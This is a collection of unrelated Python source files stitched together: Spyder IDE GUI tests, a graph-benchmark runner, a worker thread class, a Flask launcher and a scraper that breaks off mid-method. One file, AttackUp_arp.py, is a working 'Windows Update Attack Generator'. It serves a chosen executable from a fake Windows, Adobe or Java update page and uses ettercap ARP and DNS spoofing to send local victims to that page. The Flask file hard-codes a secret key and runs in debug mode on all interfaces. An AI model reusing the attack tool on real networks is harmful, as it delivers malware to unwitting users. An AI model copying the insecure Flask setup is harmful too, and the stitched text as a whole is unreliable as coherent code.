qtbot.wait(1000)
len(treewidget.editor_tree_cache[treewidget.current_editor.get_id()]) == 4
# Set some files as session without projects
prev_filenames = ["prev_file_1.py", "prev_file_2.py"]
prev_paths = []
for fname in prev_filenames:
file = tmpdir.join(fname)
file.write(read_asset_file("script_outline_1.py"))
prev_paths.append(str(file))
CONF.set('editor', 'filenames', prev_paths)
# Close project to open that file automatically
main_window.projects.close_project()
# Show outline again
outline_explorer.toggle_view_action.setChecked(True)
# Wait a bit for its tree to be filled
qtbot.wait(3000)
# Assert the editors were filled
assert all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) == 4
for editor in treewidget.editor_ids.keys()
]
)
# Remove test file from session
CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print(1 + 6)\nprint(1 + 6)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=1)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
CONF.set('ipython_console', 'pdb_prevent_closing', False)
# Check we can close a file we debug if the option is disabled
assert main_window.editor.get_current_editorstack().close_file()
CONF.set('ipython_console', 'pdb_prevent_closing', True)
# Check we are still debugging
assert shell.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
CONF.set('ipython_console', 'pdb_stop_first_line', False)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# The debugging should finish
qtbot.waitUntil(lambda: not shell.is_debugging())
CONF.set('ipython_console', 'pdb_stop_first_line', True)
# Check everything was executed
qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
# Open file in one of our directories without an __init__ file
spy_dir = osp.dirname(get_module_path('spyder'))
main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Get tree length
treewidget = outline_explorer.get_widget().treewidget
editor_id = list(treewidget.editor_ids.values())[1]
# Assert symbols in the file are detected and shown
assert len(treewidget.editor_tree_cache[editor_id]) > 0
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="Flaky on Linux")
def test_pdb_without_comm(main_window, qtbot):
"""Check if pdb works without comm."""
ipyconsole = main_window.ipyconsole
shell = ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = ipyconsole.get_widget().get_focus_widget()
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm.close()")
shell.execute("%debug print()")
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, "print('Two: ' + str(1+1))")
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert "Two: 2" in control.toPlainText()
# Press step button and expect a sig_pdb_step signal
with qtbot.waitSignal(shell.sig_pdb_step):
main_window.editor.debug_command("step")
# Stop debugging and expect an executed signal
with qtbot.waitSignal(shell.executed):
main_window.editor.stop_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Flaky on Mac and Windows")
def test_print_comms(main_window, qtbot):
"""Test warning printed when comms print."""
# Write code with a cell to a file
code = ("class Test:\n @property\n def shape(self):"
"\n print((10,))")
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
nsb = main_window.variableexplorer.current_widget()
# Create some output from spyder call
with qtbot.waitSignal(shell.executed):
shell.execute(code)
assert nsb.editor.source_model.rowCount() == 0
with qtbot.waitSignal(shell.executed):
shell.execute("a = Test()")
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Make sure the warning is printed
assert ("Output from spyder call 'get_namespace_view':"
in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows")
def test_goto_find(main_window, qtbot, tmpdir):
"""Test find goes to the right place."""
# Use UTF8 only character to make sure positions are respected
code = "we Weee wee\nWe\n🚫 wee"
match_positions = [
(0, 2),
(3, 7),
(8, 11),
(12, 14),
(18, 21)
]
subdir = tmpdir.mkdir("find-sub")
p = subdir.join("find-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
code_editor = main_window.editor.get_focus_widget()
main_window.explorer.chdir(str(subdir))
main_window.findinfiles.switch_to_plugin()
findinfiles = main_window.findinfiles.get_widget()
findinfiles.set_search_text("we+")
findinfiles.search_regexp_action.setChecked(True)
findinfiles.case_action.setChecked(False)
with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT):
findinfiles.find()
results = findinfiles.result_browser.data
assert len(results) == 5
assert len(findinfiles.result_browser.files) == 1
file_item = list(findinfiles.result_browser.files.values())[0]
assert file_item.childCount() == 5
for i in range(5):
item = file_item.child(i)
findinfiles.result_browser.setCurrentItem(item)
findinfiles.result_browser.activated(item)
cursor = code_editor.textCursor()
position = (cursor.selectionStart(), cursor.selectionEnd())
assert position == match_positions[i]
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
os.name == 'nt',
reason="test fails on windows.")
def test_copy_paste(main_window, qtbot, tmpdir):
"""Test copy paste."""
code = (
"if True:\n"
" class a():\n"
" def b():\n"
" print()\n"
" def c():\n"
" print()\n"
)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Test copy
cursor = code_editor.textCursor()
cursor.setPosition(69)
cursor.movePosition(QTextCursor.End,
QTextCursor.KeepAnchor)
code_editor.setTextCursor(cursor)
qtbot.keyClick(code_editor, "c", modifier=Qt.ControlModifier)
assert QApplication.clipboard().text() == (
"def c():\n print()\n")
assert CLIPBOARD_HELPER.metadata_indent == 8
# Test paste in console
qtbot.keyClick(shell._control, "v", modifier=Qt.ControlModifier)
expected = "In [1]: def c():\n ...: print()"
assert expected in shell._control.toPlainText()
# Test paste at zero indentation
qtbot.keyClick(code_editor, Qt.Key_Backspace)
qtbot.keyClick(code_editor, Qt.Key_Backspace)
qtbot.keyClick(code_editor, Qt.Key_Backspace)
# Check again that the clipboard is ready
assert QApplication.clipboard().text() == (
"def c():\n print()\n")
assert CLIPBOARD_HELPER.metadata_indent == 8
qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
assert "\ndef c():\n print()" in code_editor.toPlainText()
# Test paste at automatic indentation
qtbot.keyClick(code_editor, "z", modifier=Qt.ControlModifier)
qtbot.keyClick(code_editor, Qt.Key_Tab)
qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
expected = (
"\n"
" def c():\n"
" print()\n"
)
assert expected in code_editor.toPlainText()
@pytest.mark.slow
@pytest.mark.skipif(not running_in_ci(), reason="Only works in CIs")
def test_add_external_plugins_to_dependencies(main_window):
"""Test that we register external plugins in the main window."""
external_names = []
for dep in DEPENDENCIES:
name = getattr(dep, 'package_name', None)
if name:
external_names.append(name)
assert 'spyder-boilerplate' in external_names
@pytest.mark.slow
@flaky(max_runs=3)
def test_print_multiprocessing(main_window, qtbot, tmpdir):
"""Test print commands from multiprocessing."""
# Write code with a cell to a file
code = """
import multiprocessing
import sys
def test_func():
print("Test stdout")
print("Test stderr", file=sys.stderr)
if __name__ == "__main__":
p = multiprocessing.Process(target=test_func)
p.start()
p.join()
"""
p = tmpdir.join("print-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Click the run button
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
qtbot.wait(1000)
assert 'Test stdout' in control.toPlainText()
assert 'Test stderr' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
os.name == 'nt',
reason="ctypes.string_at(0) doesn't segfaults on Windows")
def test_print_faulthandler(main_window, qtbot, tmpdir):
"""Test printing segfault info from kernel crashes."""
# Write code with a cell to a file
code = """
def crash_func():
import ctypes; ctypes.string_at(0)
crash_func()
"""
p = tmpdir.join("print-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Click the run button
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
qtbot.mouseClick(run_button, Qt.LeftButton)
qtbot.wait(5000)
assert 'Segmentation fault' in control.toPlainText()
assert 'in crash_func' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize("focus_to_editor", [True, False])
def test_focus_to_editor(main_window, qtbot, tmpdir, focus_to_editor):
"""Test that the focus_to_editor option works as expected."""
# Write code with cells to a file
code = """# %%
def foo(x):
return 2 * x
# %%
foo(1)
"""
p = tmpdir.join("test.py")
p.write(code)
# Load code in the editor
main_window.editor.load(to_text_string(p))
# Change focus_to_editor option
main_window.editor.set_option('focus_to_editor', focus_to_editor)
main_window.editor.apply_plugin_settings({'focus_to_editor'})
code_editor = main_window.editor.get_current_editor()
# Wait for the console to be up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Be sure the focus is on the editor before proceeding
code_editor.setFocus()
# Select the run cell button to click it
run_cell_action = main_window.run_toolbar_actions[1]
run_cell_button = main_window.run_toolbar.widgetForAction(run_cell_action)
# Make sure we don't switch to the console after pressing the button
if focus_to_editor:
with qtbot.assertNotEmitted(
main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
):
qtbot.mouseClick(run_cell_button, Qt.LeftButton)
else:
qtbot.mouseClick(run_cell_button, Qt.LeftButton)
qtbot.wait(1000)
# Check the right widget has focus
focus_widget = QApplication.focusWidget()
if focus_to_editor:
assert focus_widget is code_editor
else:
assert focus_widget is control
# Give focus back to the editor before running the next test
if not focus_to_editor:
code_editor.setFocus()
# Move cursor to last line to run it
cursor = code_editor.textCursor()
cursor.movePosition(QTextCursor.End, QTextCursor.MoveAnchor)
cursor.movePosition(QTextCursor.PreviousBlock, QTextCursor.KeepAnchor)
code_editor.setTextCursor(cursor)
# Select the run selection button to click it
run_selection_action = main_window.run_toolbar_actions[3]
run_selection_button = main_window.run_toolbar.widgetForAction(
run_selection_action)
# Make sure we don't switch to the console after pressing the button
if focus_to_editor:
with qtbot.assertNotEmitted(
main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
):
qtbot.mouseClick(run_selection_button, Qt.LeftButton)
else:
qtbot.mouseClick(run_selection_button, Qt.LeftButton)
qtbot.wait(1000)
# Check the right widget has focus
focus_widget = QApplication.focusWidget()
if focus_to_editor:
assert focus_widget is code_editor
else:
assert focus_widget is control
@pytest.mark.slow
@flaky(max_runs=3)
def test_focus_to_consoles(main_window, qtbot):
"""
Check that we give focus to the text widget of our consoles after focus
is given to their dockwidgets.
"""
# Wait for the console to be up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Show internal console
console = main_window.get_plugin(Plugins.Console)
console.toggle_view_action.setChecked(True)
# Change to the IPython console and assert focus is given to its focus
# widget
main_window.ipyconsole.dockwidget.raise_()
focus_widget = QApplication.focusWidget()
assert focus_widget is control
# Change to the Internal console and assert focus is given to its focus
# widget
console.dockwidget.raise_()
focus_widget = QApplication.focusWidget()
assert focus_widget is console.get_widget().get_focus_widget()
if __name__ == "__main__":
pytest.main()
|
AttackUp_arp.py
|
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from os import getcwd,popen,chdir,walk,path,remove,stat,getuid
from Module.DHCPstarvation import frm_dhcp_Attack,conf_etter
from platform import linux_distribution
from re import search
import threading
from shutil import copyfile
class frm_update_attack(QMainWindow):
def __init__(self, parent=None):
super(frm_update_attack, self).__init__(parent)
self.form_widget = frm_WinSoftUp(self)
self.setCentralWidget(self.form_widget)
sshFile="Core/dark_style.css"
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
self.setWindowTitle("Windows Update Attack Generator ")
self.setWindowIcon(QIcon('rsc/icon.ico'))
class frm_WinSoftUp(QWidget):
def __init__(self, parent=None):
super(frm_WinSoftUp, self).__init__(parent)
self.Main = QVBoxLayout()
self.control = None
self.module2 = frm_dhcp_Attack()
self.path_file = None
self.owd = getcwd()
self.GUI()
def GUI(self):
self.form = QFormLayout(self)
self.grid = QGridLayout(self)
self.grid1 = QGridLayout(self)
self.path = QLineEdit(self)
self.logBox = QListWidget(self)
self.path.setFixedWidth(400)
#combobox
self.cb_interface = QComboBox(self)
self.refresh_interface(self.cb_interface)
#label
self.lb_interface = QLabel("Network Adapter:")
# buttons
self.btn_open = QPushButton("...")
self.btn_stop = QPushButton("Stop",self)
self.btn_reload = QPushButton("refresh",self)
self.btn_start_server = QPushButton("Start Server",self)
# size
self.btn_open.setMaximumWidth(90)
self.btn_stop.setFixedHeight(50)
self.btn_start_server.setFixedHeight(50)
#icons
self.btn_open.setIcon(QIcon("rsc/open.png"))
self.btn_stop.setIcon(QIcon("rsc/Stop.png"))
self.btn_reload.setIcon(QIcon("rsc/refresh.png"))
self.btn_start_server.setIcon(QIcon("rsc/server.png"))
# connect buttons
self.btn_open.clicked.connect(self.getpath)
self.btn_reload.clicked.connect(self.inter_get)
self.btn_start_server.clicked.connect(self.server_start)
self.btn_stop.clicked.connect(self.stop_attack)
# radionButton
self.rb_windows = QRadioButton("Windows Update",self)
self.rb_windows.setIcon(QIcon("rsc/winUp.png"))
self.rb_adobe = QRadioButton("Adobe Update", self)
self.rb_adobe.setIcon(QIcon("rsc/adobe.png"))
self.rb_java = QRadioButton("Java Update", self)
self.rb_java.setIcon(QIcon("rsc/java.png"))
self.grid.addWidget(self.rb_windows, 0,1)
self.grid.addWidget(self.rb_adobe, 0,2)
self.grid.addWidget(self.rb_java, 0,3)
# check interface
self.grid.addWidget(self.lb_interface,1,1)
self.grid.addWidget(self.cb_interface,1,2)
self.grid.addWidget(self.btn_reload, 1,3)
#grid 2
self.grid1.addWidget(self.btn_start_server,0,2)
self.grid1.addWidget(self.btn_stop,0,4)
#form add layout
self.form.addRow(self.path,self.btn_open)
self.form.addRow(self.grid)
self.form.addRow(self.grid1)
self.form.addRow(self.logBox)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def stop_attack(self):
popen("killall xterm")
self.alt_etter("")
if path.isfile("Module/Win-Explo/Windows_Update/index.html"):
remove("Module/Win-Explo/Windows_Update/index.html")
if path.isfile("Module/Win-Explo/Windows_Update/windows-update.exe"):
remove("Module/Win-Explo/Windows_Update/windows-update.exe")
QMessageBox.information(self,"Clear Setting", "log cLear success ")
def inter_get(self):
self.refresh_interface(self.cb_interface)
def refresh_interface(self,cb):
self.module2 = frm_dhcp_Attack()
cb.clear()
n = self.module2.placa()
for i,j in enumerate(n):
if self.module2.get_ip_local(n[i]) != None:
if n[i] != "":
cb.addItem(n[i])
def server_start(self):
if len(self.path.text()) <= 0:
QMessageBox.information(self, "Path file Error", "Error in get the file path.")
else:
if self.rb_windows.isChecked():
directory = "Module/Win-Explo/Windows_Update/"
self.logBox.addItem("[+] Set page Attack.")
try:
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
copyfile(self.path_file,directory+"windows-update.exe")
except OSError,e:
print e
if not getuid() != 0:
file_html = open("Module/Win-Explo/Settings_WinUpdate.html","r").read()
settings_html = file_html.replace("KBlenfile", str(self.getSize(self.path_file))+"KB")
if path.isfile(directory+"index.html"):
remove(directory+"index.html")
confFile = open(directory+"index.html","w")
confFile.write(settings_html)
confFile.close()
self.t = threading.Thread(target=self.threadServer,args=(directory,),)
self.t.daemon = True
self.t.start()
else:
QMessageBox.information(self, "Permission Denied", 'the Tool must be run as root try again.')
self.logBox.clear()
if path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
def dns_start(self):
if self.control != None:
self.logBox.addItem("[+] Settings Etter.dns.")
ipaddress = self.module2.get_ip_local(str(self.cb_interface.currentText()))
config_dns = ("* A %s"%(ipaddress))
self.path_file_etter = self.find("etter.dns", "/etc/ettercap/")
self.logBox.addItem("[+] check Path Ettercap.")
if self.path_file_etter == None:
self.path_file_etter = self.find("etter.dns", "/usr/share/ettercap/")
if not self.path_file_etter != None:
QMessageBox.information(self, 'Path not Found', "the file etter.dns not found check if ettercap this installed")
if self.path_file_etter != None:
self.alt_etter(config_dns)
self.thread2 = threading.Thread(target=self.ThreadDNS, args=(str(self.cb_interface.currentText()),))
self.thread2.daemon = True
self.thread2.start()
else:
QMessageBox.information(self, 'Server Phishing Error', "Error not start Server...")
def threadServer(self,directory):
self.logBox.addItem("[+] Get IP local network.")
ip = self.module2.get_ip_local(self.cb_interface.currentText())
try:
chdir(directory)
except OSError:
pass
popen("service apache2 stop")
self.control = 1
n = (popen("""xterm -geometry 75x15-1+0 -T "Windows Fake update " -e php -S %s:80"""%(ip))).read() + "exit"
chdir(self.owd)
while n != "dsa":
if n == "exit":
self.logBox.clear()
n = "dsa"
self.control = None
if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
remove(directory+"index.html")
break
def ThreadDNS(self,interface):
self.logBox.addItem("[+] Start Attack all DNS.")
distro = linux_distribution()
if search("Kali Linux",distro[0]):
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
else:
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
while n != "dsa":
if n == "exit":
#self.dns_status(False)
self.logBox.clear()
n = "dsa"
break
def getpath(self):
file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
if len(file) > 0:
self.path_file = file
self.path.setText(file)
def alt_etter(self,data):
configure = conf_etter(data)
file = open(self.path_file_etter, "w")
file.write(configure)
file.close()
def find(self,name, paths):
for root, dirs, files in walk(paths):
if name in files:
return path.join(root, name)
def getSize(self,filename):
st = stat(filename)
return st.st_size
|
app.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import sys, glob, os
sys.path.insert(0, glob.glob(os.path.abspath(os.path.dirname(__file__)) +
'/../../tools/thrift-0.9.3/lib/py/build/lib*')[0])
from controllers import *
from controllers.Parser import cmd_port
from flask import *
from threading import Thread
import logging
# Initialize the Flask app with the template folder address.
app = Flask(__name__, template_folder='templates')
# app.config.from_object('config')
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # 16 MB due to MongoDB
# Register the controllers.
app.register_blueprint(Main.main)
app.register_blueprint(User.user)
app.register_blueprint(Create.create)
app.register_blueprint(Learn.learn)
app.register_blueprint(Infer.infer)
# Session.
app.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'
def flask_listener():
# For https (with ASR capability)
if os.environ.get('SECURE_HOST'):
print 'Starting secure flask'
app.run(host='0.0.0.0', port=3000, debug=True, use_reloader=False,
threaded=True, ssl_context=('certs/server.crt', 'certs/server.key'))
# For http (without ASR capability)
else:
print 'Starting non-secure flask'
app.run(host='0.0.0.0', port=3000, debug=True, use_reloader=False,
threaded=True)
def web_socket_listener():
print 'Start web socket at ' + str(cmd_port)
logging.basicConfig(level=logging.DEBUG,
format="%(levelname)8s %(asctime)s %(message)s ")
logging.debug('Starting up server')
WebSocket.tornado.options.parse_command_line()
# For wss (with ASR capability)
if os.environ.get('SECURE_HOST'):
print 'Starting secure web socket'
WebSocket.Application().listen(cmd_port, ssl_options={
"certfile":"certs/server.crt",
"keyfile":"certs/server.key"})
# For ws (without ASR capability)
else:
print 'Starting non-secure web socket'
WebSocket.Application().listen(cmd_port)
WebSocket.tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
Thread(target = flask_listener).start()
web_socket_listener()
|
fps.py
|
import time
import random
import threading
while True:
globals()['sec'] = 0
globals()['count'] = 0
def count_up():
while globals()['sec'] != 1:
21762138476832437**31324
globals()['count'] += 1
x = threading.Thread(target=count_up)
x.start()
time.sleep(1)
globals()['sec'] = 1
print(globals()['count'])
|
run_graph_stats.py
|
import socket
from exec_utilities import time_out_util
from config import *
from exec_utilities.exec_utils import *
from multiprocessing import Process
def run_exp(env_tag=knl_tag, with_c_group=True, data_path_tag=graph_stat_exec_tag):
hostname = socket.gethostname()
with open('config.json') as ifs:
my_config_dict = json.load(ifs)[env_tag]
our_exec_path = my_config_dict[data_path_tag]
data_set_path = my_config_dict[data_set_path_tag]
data_set_lst = [
# "webgraph_eu",
# "webgraph_it",
# "webgraph_twitter"
# "s24-16",
# "s24-32",
# "ssca2-config-s17-c1000",
# "ssca2-config-s17-c10000"
# "snap_friendster"
"ssca-s17-c1k",
"ssca-s17-c2k",
"ssca-s17-c4k",
"ssca-s17-c6k",
"ssca-s17-c8k",
"ssca-s17-c10k",
"s22-16",
"s23-16",
"s24-16",
"s25-16",
"s26-16",
"s27-16"
]
# thread_num_lst = [1, 2, 4, 8, 16, 32, 40, 56]
thread_num_lst = [64] if env_tag is gpu24_tag else [40]
exp_res_root_name = 'exp_results'
folder_name = 'exp-2020-01-11-graph-stats' + os.sep + hostname
org_order_lst = ['org']
our_reorder_dict = {
'ustgpu2': org_order_lst,
'ustgpu1': org_order_lst,
'gpu23': org_order_lst,
'gpu24': org_order_lst
}
mc_brb = 'MC-BRB'
graph_stats = 'graph_stats'
our_exec_name_lst = [
mc_brb,
graph_stats
]
filtered_reorder_lst = our_reorder_dict[hostname]
work_dir = os.sep.join(['.', exp_res_root_name, folder_name])
os.system('mkdir -p ' + work_dir)
logger = get_logger(os.sep.join([work_dir, hostname + '.log']), name=__name__)
logger.info(my_splitter + time.ctime() + my_splitter)
logger.info('res folder: {}'.format(folder_name))
logger.info('our exec folder: {}'.format(our_exec_path))
logger.info('our exec name list: {}'.format(our_exec_name_lst))
logger.info('thread# lst: {}'.format(thread_num_lst))
logger.info('data set lst: {}'.format(data_set_lst))
logger.info('filtered_reorder_lst: {}'.format(filtered_reorder_lst))
def one_round():
for data_set_name in data_set_lst:
for reorder_method in filtered_reorder_lst:
for our_algorithm in our_exec_name_lst:
for t_num in thread_num_lst:
statistics_dir = os.sep.join(
map(str, ['.', exp_res_root_name, folder_name, data_set_name, reorder_method, t_num]))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'log']))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'dstat']))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'dstat_clean']))
statistics_file_path = statistics_dir + os.sep + our_algorithm + '.log'
dstat_file_path = os.sep.join([statistics_dir, 'dstat', our_algorithm + '-dstat.log'])
log_file_path = os.sep.join([statistics_dir, 'log', our_algorithm + '-raw.log'])
logger.info('stat file path: {}'.format(statistics_file_path))
# 1st: write header
append_header(statistics_file_path)
append_header(dstat_file_path)
append_header(log_file_path)
# 2nd: run exec cmd
algorithm_path = our_exec_path + os.sep + our_algorithm
if our_algorithm is mc_brb:
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '',
algorithm_path, 'MC-BRB', data_set_path + os.sep + data_set_name])
elif our_algorithm is graph_stats:
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '',
algorithm_path, '-i', data_set_path + os.sep + data_set_name,
'-l', statistics_file_path])
cmd = ' '.join(params_lst)
logger.info('exec-cmd: {}'.format(cmd))
time_out = 3600 * 2
my_env = os.environ.copy()
def execute_cmd(my_cmd):
logger.info('sub-process: {}'.format(my_cmd))
os.system(my_cmd)
# 3rd: spawn a new process to run the exec
dstat_cmd = 'dstat -tcdrlmgyn --fs >> ' + dstat_file_path
p = Process(target=execute_cmd, args=(dstat_cmd,))
p.start()
my_env['OMP_NUM_THREADS'] = str(t_num)
tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out,
env=my_env)
time_out_util.kill_term_recursive(p.pid)
modify_dstat_file(dstat_file_path)
# 4th: append outputs
write_split(statistics_file_path)
with open(statistics_file_path, 'a+') as ifs:
ifs.write(correct_info)
ifs.write('\nis_time_out:' + str(tle_flag))
ifs.write(my_splitter + time.ctime() + my_splitter)
ifs.write('\n\n\n\n')
if len(info) > 0:
with open(log_file_path, 'a+') as ofs:
ofs.write(info)
logger.info('finish: {}'.format(cmd))
for _ in range(1):
one_round()
if __name__ == '__main__':
hostname = socket.gethostname()
if hostname.startswith('ustgpu2'):
run_exp(env_tag=ustgpu2_tag, with_c_group=False)
elif hostname.startswith('ustgpu1'):
run_exp(env_tag=ustgpu1_tag, with_c_group=False)
elif hostname.startswith('lccpu12'):
run_exp(env_tag=lccpu12_tag, with_c_group=False)
elif hostname.startswith('knl'):
run_exp(env_tag=knl_tag, with_c_group=False)
elif hostname.startswith('gpu24'):
run_exp(env_tag=gpu24_tag, with_c_group=False)
elif hostname.startswith('gpu23'):
run_exp(env_tag=gpu23_tag)
elif hostname.startswith('gpu'):
run_exp(env_tag=gpu_other_tag)
elif hostname.startswith('hnode'):
run_exp(env_tag=hnode_79_tag, with_c_group=False)
else:
# run_exp(env_tag=knl_tag, data_path_tag=exec_path_tag)
run_exp(env_tag=knl_tag, data_path_tag=exec_path_non_hbw_tag)
|
BackgroundWorker.py
|
#
# BackgroundWorker.py
#
# (c) 2020 by Andreas Kraft
# License: BSD 3-Clause License. See the LICENSE file for further details.
#
# This class implements a background process.
#
from Logging import Logging
import threading, time
class BackgroundWorker(object):
def __init__(self, updateIntervall, workerCallback):
self.workerUpdateIntervall = updateIntervall
self.workerCallback = workerCallback
self.doStop = True
self.workerThread = None
def start(self):
Logging.logDebug('Starting worker thread')
self.doStop = False
self.workerThread = threading.Thread(target=self.work)
self.workerThread.setDaemon(True) # Make the thread a daemon of the main thread
self.workerThread.start()
def stop(self):
Logging.log('Stopping worker thread')
# Stop the thread
self.doStop = True
if self.workerThread is not None:
self.workerThread.join(self.workerUpdateIntervall + 5) # wait a short time for the thread to terminate
self.workerThread = None
def work(self):
while not self.doStop:
if self.workerCallback():
self.sleep()
else:
self.stop()
# self-made sleep. Helps in speed-up shutdown etc
divider = 5.0
def sleep(self):
for i in range(0, int(self.workerUpdateIntervall * self.divider)):
time.sleep(1.0 / self.divider)
if self.doStop:
break
|
capes_scraper.py
|
import os
import sqlite3
import requests
import sys
import traceback
import shutil
from threading import Thread, Lock
from requests.exceptions import Timeout
from settings import DATABASE_PATH, HOME_DIR, MAX_RETRIES
from settings import CAPES_URL, CAPES_HTML_PATH
CAPES_HOST = 'cape.ucsd.edu'
CAPES_ACCEPT = 'html'
CAPES_USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36'
class CAPESScraper:
def __init__(self):
# Read all departments from the SQL database
self.database = sqlite3.connect(DATABASE_PATH)
self.cursor = self.database.cursor()
self.cursor.execute("SELECT DEPT_CODE FROM DEPARTMENT")
# fetching the data returns a tuple with one element,
# so using list comprehension to convert the data
self.departments = [i[0] for i in self.cursor.fetchall()]
# Boolean to signal that a thread has crashed
self.mutex = Lock()
self.crashed = False
# Create top level folder if it doesn't exist
if os.path.exists(CAPES_HTML_PATH):
shutil.rmtree(CAPES_HTML_PATH)
os.makedirs(CAPES_HTML_PATH)
# Thread-safe way of marking that at least one thread has crashed
def set_crashed(self):
